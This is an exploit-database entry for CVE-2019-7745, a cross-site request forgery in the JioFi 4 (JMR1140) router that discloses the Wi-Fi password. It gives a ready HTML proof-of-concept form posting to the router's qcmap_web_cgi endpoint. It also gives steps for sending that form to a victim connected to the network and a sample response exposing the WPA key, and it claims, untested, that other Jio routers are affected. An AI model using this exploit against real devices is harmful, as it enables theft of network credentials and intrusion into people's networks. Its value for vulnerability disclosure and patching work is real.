Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)

2019-02-13 17:05:06

# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7745

Description:

JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field.

POC-
1. Create a view.html and insert

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetWiFi_Setting" />
<input type="hidden" name="Mask" value="0" />
<input type="hidden" name="result" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


2. Send to victim(who is connected to the wifi network).
3. The response gives the current wifi password.
Example response-

{"Page":"GetWiFi_Setting","Mask":"0","result":"SUCCESS","ssid":"JioFi4_08FE5F","mode_802_11":"11bgn","tx_power":"MID",
"wmm":"Enable","wps_enable":"PushButton","wifi_security":"WPA2PSK","wpa_encryption_type":"AES",
"wpa_security_key":"leakedpassword",".....etc}


Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.

Fixes

No fixes

In order to submit a new fix you need to be registered.